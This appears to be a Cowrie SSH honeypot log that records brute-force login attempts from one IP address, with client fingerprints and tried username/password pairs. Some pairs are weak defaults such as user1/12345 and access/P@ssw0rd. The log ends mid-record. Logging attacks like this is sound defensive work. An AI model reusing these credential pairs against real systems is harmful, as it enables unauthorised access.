{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:11.005854Z","src_ip":"212.227.235.229","session":"86d15877da49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:11.240400Z","src_ip":"212.227.235.229","session":"86d15877da49"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:56:12.222866Z","src_ip":"212.227.235.229","session":"86d15877da49"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:13.461128Z","src_ip":"212.227.235.229","session":"86d15877da49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52207,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3e102714ec5","protocol":"ssh","message":"New connection: 212.227.235.229:52207 (1.2.3.4:22) [session: b3e102714ec5]","sensor":"my-vps","timestamp":"2025-09-09T01:56:13.696678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:13.697562Z","src_ip":"212.227.235.229","session":"b3e102714ec5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:13.933198Z","src_ip":"212.227.235.229","session":"b3e102714ec5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:56:14.917101Z","src_ip":"212.227.235.229","session":"b3e102714ec5"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:15.154436Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:15.155835Z","src_ip":"212.227.235.229","session":"b3e102714ec5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33530,"dst_ip":"1.2.3.4","dst_port":22,"session":"838a53d2be3e","protocol":"ssh","message":"New connection: 212.227.235.229:33530 (1.2.3.4:22) [session: 838a53d2be3e]","sensor":"my-vps","timestamp":"2025-09-09T01:56:15.754750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:15.756510Z","src_ip":"212.227.235.229","session":"838a53d2be3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:15.866093Z","src_ip":"212.227.235.229","session":"838a53d2be3e"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:56:16.346362Z","src_ip":"212.227.235.229","session":"838a53d2be3e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:17.459953Z","src_ip":"212.227.235.229","session":"838a53d2be3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51036,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9d624b30ce9","protocol":"ssh","message":"New connection: 212.227.235.229:51036 (1.2.3.4:22) [session: c9d624b30ce9]","sensor":"my-vps","timestamp":"2025-09-09T01:56:35.372458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:35.373402Z","src_ip":"212.227.235.229","session":"c9d624b30ce9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:35.459578Z","src_ip":"212.227.235.229","session":"c9d624b30ce9"}
{"eventid":"cowrie.login.failed","username":"db","password":"!","message":"login attempt [db/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:56:35.847188Z","src_ip":"212.227.235.229","session":"c9d624b30ce9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:36.936375Z","src_ip":"212.227.235.229","session":"c9d624b30ce9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51028,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe76e328997d","protocol":"ssh","message":"New connection: 212.227.235.229:51028 (1.2.3.4:22) [session: fe76e328997d]","sensor":"my-vps","timestamp":"2025-09-09T01:56:39.536971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:39.537718Z","src_ip":"212.227.235.229","session":"fe76e328997d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:39.775340Z","src_ip":"212.227.235.229","session":"fe76e328997d"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:56:40.769449Z","src_ip":"212.227.235.229","session":"fe76e328997d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:42.009344Z","src_ip":"212.227.235.229","session":"fe76e328997d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53706,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c4e1a0030c9","protocol":"ssh","message":"New connection: 212.227.235.229:53706 (1.2.3.4:22) [session: 3c4e1a0030c9]","sensor":"my-vps","timestamp":"2025-09-09T01:56:50.202093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:50.214242Z","src_ip":"212.227.235.229","session":"3c4e1a0030c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:50.461774Z","src_ip":"212.227.235.229","session":"3c4e1a0030c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39896,"dst_ip":"1.2.3.4","dst_port":22,"session":"316dcf28ab7a","protocol":"ssh","message":"New connection: 212.227.235.229:39896 (1.2.3.4:22) [session: 316dcf28ab7a]","sensor":"my-vps","timestamp":"2025-09-09T01:56:51.445724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:51.446539Z","src_ip":"212.227.235.229","session":"316dcf28ab7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:51.694620Z","src_ip":"212.227.235.229","session":"316dcf28ab7a"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T01:56:52.727283Z","src_ip":"212.227.235.229","session":"316dcf28ab7a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:53.978176Z","src_ip":"212.227.235.229","session":"316dcf28ab7a"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:01.690843Z","src_ip":"212.227.235.229","session":"3c4e1a0030c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60928,"dst_ip":"1.2.3.4","dst_port":22,"session":"72da5de6edea","protocol":"ssh","message":"New connection: 212.227.235.229:60928 (1.2.3.4:22) [session: 72da5de6edea]","sensor":"my-vps","timestamp":"2025-09-09T01:57:02.725482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:02.726392Z","src_ip":"212.227.235.229","session":"72da5de6edea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:02.967664Z","src_ip":"212.227.235.229","session":"72da5de6edea"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:03.973704Z","src_ip":"212.227.235.229","session":"72da5de6edea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53226,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd8e248363de","protocol":"ssh","message":"New connection: 212.227.235.229:53226 (1.2.3.4:22) [session: fd8e248363de]","sensor":"my-vps","timestamp":"2025-09-09T01:57:04.237869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:04.238570Z","src_ip":"212.227.235.229","session":"fd8e248363de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:04.498139Z","src_ip":"212.227.235.229","session":"fd8e248363de"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:05.215979Z","src_ip":"212.227.235.229","session":"72da5de6edea"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"12345678","message":"login attempt [anonymous/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:05.575528Z","src_ip":"212.227.235.229","session":"fd8e248363de"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:06.836697Z","src_ip":"212.227.235.229","session":"fd8e248363de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42468,"dst_ip":"1.2.3.4","dst_port":22,"session":"751e772fd3db","protocol":"ssh","message":"New connection: 212.227.235.229:42468 (1.2.3.4:22) [session: 751e772fd3db]","sensor":"my-vps","timestamp":"2025-09-09T01:57:08.621221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:08.622095Z","src_ip":"212.227.235.229","session":"751e772fd3db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:08.880427Z","src_ip":"212.227.235.229","session":"751e772fd3db"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:09.949828Z","src_ip":"212.227.235.229","session":"751e772fd3db"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:11.229096Z","src_ip":"212.227.235.229","session":"751e772fd3db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36517,"dst_ip":"1.2.3.4","dst_port":22,"session":"72bc75d1bfac","protocol":"ssh","message":"New connection: 212.227.235.229:36517 (1.2.3.4:22) [session: 72bc75d1bfac]","sensor":"my-vps","timestamp":"2025-09-09T01:57:27.395190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:27.396259Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hm